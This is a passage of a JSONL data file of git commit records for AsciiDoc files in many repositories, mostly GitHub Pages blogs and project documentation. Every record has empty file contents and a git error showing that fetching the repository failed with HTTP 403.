403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e821099d7754de70811d5b5369f21d014bd2b831","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b818588aa7a630f259b02a9d2c583b582832ffb2","subject":"Update 2017-09-26-zapier-Google-Trello.adoc","message":"Update 2017-09-26-zapier-Google-Trello.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dced3ac1041136d70739418c8ea537a549553231","subject":"Update 2015-02-24-Test-image.adoc","message":"Update 2015-02-24-Test-image.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-02-24-Test-image.adoc","new_file":"_posts\/2015-02-24-Test-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e4deb92760a8522136ae1188173b98e05fb34da","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca9bfa1764f50adafb0cae9308212e3447978b0c","subject":"Update 2016-05-13-Sub.adoc","message":"Update 2016-05-13-Sub.adoc","repos":"tongqqiu\/tongqqiu.github.io,tongqqiu\/tongqqiu.github.io,tongqqiu\/tongqqiu.github.io","old_file":"_posts\/2016-05-13-Sub.adoc","new_file":"_posts\/2016-05-13-Sub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tongqqiu\/tongqqiu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7f6e2ad07025cc18eba19afa3bbacd2b7242da0","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c367b4626257af3d9cfffaa67ece0bbe3737997","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e8ce081d5ca76614aee2ed883cc58c84e005d2f","subject":"Initial revision of the HttpsMonitor monitor.","message":"Initial revision of the HttpsMonitor monitor.\n\nCyrille\n","repos":"roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/HttpsMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/HttpsMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"3749b635bea4107bf391e6761be0adbeabbb3f72","subject":"Publish 2016-7-8.adoc","message":"Publish 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-8.adoc","new_file":"2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88573c01df6ac553b881848e1019152b74c66500","subject":"Update 2017-10-11-Changing-Masonry-in-a-Changing-World.adoc","message":"Update 2017-10-11-Changing-Masonry-in-a-Changing-World.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-10-11-Changing-Masonry-in-a-Changing-World.adoc","new_file":"_posts\/2017-10-11-Changing-Masonry-in-a-Changing-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7004c48cf99ee443ab70111b8f5c7a5ccedd41b0","subject":"Resource Developer's Guide","message":"Resource Developer's Guide\n","repos":"liveoak-io\/liveoak.io,liveoak-io\/liveoak.io,liveoak-io\/liveoak.io","old_file":"docs\/guides\/resource_developers_guide.adoc","new_file":"docs\/guides\/resource_developers_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liveoak-io\/liveoak.io.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d451ae0ab753d0404520d32706019fff78167c00","subject":"Guide for enabling HTTPS\/TLS (#9536)","message":"Guide for enabling HTTPS\/TLS (#9536)\n\nInitial version of the guide for enabling TLS\/HTTPS for Quarkus based Keycloak\r\n\r\nCloses #9458","repos":"ahus1\/keycloak,stianst\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,abstractj\/keycloak,keycloak\/keycloak,keycloak\/keycloak,ahus1\/keycloak,srose\/keycloak,raehalme\/keycloak,stianst\/keycloak,raehalme\/keycloak,jpkrohling\/keycloak,jpkrohling\/keycloak,abstractj\/keycloak,raehalme\/keycloak,keycloak\/keycloak,reneploetz\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,reneploetz\/keycloak,hmlnarik\/keycloak,srose\/keycloak,reneploetz\/keycloak,thomasdarimont\/keycloak,stianst\/keycloak,stianst\/keycloak,hmlnarik\/keycloak,abstractj\/keycloak,jpkrohling\/keycloak,srose\/keycloak,thomasdarimont\/keycloak,hmlnarik\/keycloak,ahus1\/keycloak,thomasdarimont\/keycloak,reneploetz\/keycloak,raehalme\/keycloak,mhajas\/keycloak,srose\/keycloak,mhajas\/keycloak,keycloak\/keycloak,mhajas\/keycloak,jpkrohling\/keycloak,keycloak\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,mhajas\/keycloak,raehalme\/keycloak,stianst\/keycloak,srose\/keycloak,hmlnarik\/keycloak,reneploetz\/keycloak,ahus1\/keycloak,hmlnarik\/keycloak,ahus1\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak","old_file":"docs\/guides\/src\/main\/server\/enabletls.adoc","new_file":"docs\/guides\/src\/main\/server\/enabletls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"638a94e526a1778a76cdc00d1c07cf0145dfa16e","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28d9f261afad8b0887b5807d696124fe43d8f931","subject":"Struct","message":"Struct\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"JAX-RS client.adoc","new_file":"JAX-RS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"152193421e3677f8a3ebd57244a1528a2732cdbc","subject":"y2b create post iPhone 7 - What Apple Doesn't Want You To Know","message":"y2b create post iPhone 7 - What Apple Doesn't Want You To Know","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-18-iPhone-7--What-Apple-Doesnt-Want-You-To-Know.adoc","new_file":"_posts\/2016-10-18-iPhone-7--What-Apple-Doesnt-Want-You-To-Know.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"092cc1fef6357524e398b317705121d00a52eaf9","subject":"Deleted 2018-2-2-Web-R-T-C.adoc","message":"Deleted 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2018-2-2-Web-R-T-C.adoc","new_file":"2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"131359399b4c7b387ae279c2f3df6175b0af9664","subject":"Create SystemsDesign.adoc","message":"Create SystemsDesign.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"SystemsDesign.adoc","new_file":"SystemsDesign.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"405d1da0b1b03216e2ade8d8dcfda9e60a31615a","subject":"Update 2015-07-20-Server-Command.adoc","message":"Update 2015-07-20-Server-Command.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-07-20-Server-Command.adoc","new_file":"_posts\/2015-07-20-Server-Command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f17c7ee5bf062ee551a01fc485e31d4e74661ce0","subject":"Update 2015-09-19-JSON-in-Python.adoc","message":"Update 2015-09-19-JSON-in-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"662b4256655360aa6a95c8af7907f8abf9e0cc56","subject":"Update 2016-11-07-Monday-Workday.adoc","message":"Update 2016-11-07-Monday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday-Workday.adoc","new_file":"_posts\/2016-11-07-Monday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1625e279debe70f1a1b5774b6bc0f2ce93389dea","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c2f976812ca0a094b0d580b51b0e52d128b7cfe","subject":"Update 2017-12-18-P-H-Per-Golang.adoc","message":"Update 2017-12-18-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3989d4d62b0efc5dd89fd0f127ece78e1dd09bc7","subject":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","message":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c8976dbb844cf809b490fa56c3df6e76b76ee7d","subject":"Update 2019-11-23-one-year-later.adoc","message":"Update 2019-11-23-one-year-later.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-23-one-year-later.adoc","new_file":"_posts\/2019-11-23-one-year-later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c1c5ba68387d58b4330648ab04b229729c9fb16","subject":"Create 2014-07-22-forge-2.7.2.final.asciidoc","message":"Create 2014-07-22-forge-2.7.2.final.asciidoc","repos":"addonis1990\/docs,forge\/docs,forge\/docs,agoncal\/docs,addonis1990\/docs,luiz158\/docs,agoncal\/docs,luiz158\/docs","old_file":"news\/2014-07-22-forge-2.7.2.final.asciidoc","new_file":"news\/2014-07-22-forge-2.7.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f94904e6ae4703713cf9c742f205624491770d84","subject":"Update 2016-03-16-c.adoc","message":"Update 2016-03-16-c.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-03-16-c.adoc","new_file":"_posts\/2016-03-16-c.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f437b330c86c0bd2631f5d97278b76b650a8e7f2","subject":"Update 2017-05-30-2.adoc","message":"Update 2017-05-30-2.adoc","repos":"SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io","old_file":"_posts\/2017-05-30-2.adoc","new_file":"_posts\/2017-05-30-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SRTjiawei\/SRTjiawei.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff8267565ec9fda3093a9bb8e20d7f69437ac028","subject":"add events-feed page","message":"add events-feed page\n","repos":"clojure\/clojure-site","old_file":"content\/events-feed.adoc","new_file":"content\/events-feed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5e7c4fcf04a5007857a0d1b70bd0fc9d986e3512","subject":"Added reference to byteman","message":"Added reference to byteman\n","repos":"ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/07\/01\/hawkular-btm-0.1.0-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/07\/01\/hawkular-btm-0.1.0-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49eef9610961fb809359fc20123884ccaea74101","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfbd8b4b5625bf7fb407c6aad64f67e5efb9f885","subject":"Update 2016-07-04-A-Vicennial-Saga.adoc","message":"Update 2016-07-04-A-Vicennial-Saga.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01a8376694e7689e35ba57341f544976d5d2c99f","subject":"Update 2017-01-27-Model.adoc","message":"Update 2017-01-27-Model.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Model.adoc","new_file":"_posts\/2017-01-27-Model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"001b301a2112008ae1830ca98c5026772b75874a","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5037f716a0f57982562cc99f14ef7307d0e9aa41","subject":"Update 2017-04-05-Make-log-work-first.adoc","message":"Update 2017-04-05-Make-log-work-first.adoc","repos":"gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing","old_file":"_posts\/2017-04-05-Make-log-work-first.adoc","new_file":"_posts\/2017-04-05-Make-log-work-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gogonkt\/makenothing.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1ea60e00129d3c65e15b7d935d461c9225b9fa8","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f882b79fe71397436b4ccef5517ba77197e93103","subject":"Use docker linking between hawkular-services and cassandra","message":"Use docker linking between hawkular-services and cassandra\n\nThis is a bit simpler than getting the ip address of the container\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2090d5c56ccb35b01b311497242bfe4ea7715f55","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cee1373f6f5b39c958a663f9bcb133cdddb406cf","subject":"Update 2015-07-14-Creating-an-Insightly-CRM-opportunity-via-API.adoc","message":"Update 2015-07-14-Creating-an-Insightly-CRM-opportunity-via-API.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-07-14-Creating-an-Insightly-CRM-opportunity-via-API.adoc","new_file":"_posts\/2015-07-14-Creating-an-Insightly-CRM-opportunity-via-API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35fce5fc72da28bfc976c6e318a0234cb1447557","subject":"Update 2018-07-01-Save-time-at-diary-automating-recurring-tasks.adoc","message":"Update 2018-07-01-Save-time-at-diary-automating-recurring-tasks.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2018-07-01-Save-time-at-diary-automating-recurring-tasks.adoc","new_file":"_posts\/2018-07-01-Save-time-at-diary-automating-recurring-tasks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a2495f6305665ce025efc1cb8d8d8be7cff0403","subject":"Revert \"Delete the file at '_posts\/2019-01-31-draft-embeded-math-formula.adoc'\"","message":"Revert \"Delete the file at '_posts\/2019-01-31-draft-embeded-math-formula.adoc'\"\n\nThis reverts commit 13448bc5898528f6eb4d769a8c5be70ee11c0791.\n","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-draft-embeded-math-formula.adoc","new_file":"_posts\/2019-01-31-draft-embeded-math-formula.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c71b6df0eedc6ad3a153cd55159f18817482792","subject":"Update Two_Factor_PAM_Configuration.adoc","message":"Update Two_Factor_PAM_Configuration.adoc","repos":"eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam","old_file":"doc\/Two_Factor_PAM_Configuration.adoc","new_file":"doc\/Two_Factor_PAM_Configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3e0a7f7972776081b7006ce3fd711b8c496ca1e6","subject":"Update 2015-11-01-Despliegue-de-entorno-base-de-trabajo.adoc","message":"Update 2015-11-01-Despliegue-de-entorno-base-de-trabajo.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Despliegue-de-entorno-base-de-trabajo.adoc","new_file":"_posts\/2015-11-01-Despliegue-de-entorno-base-de-trabajo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 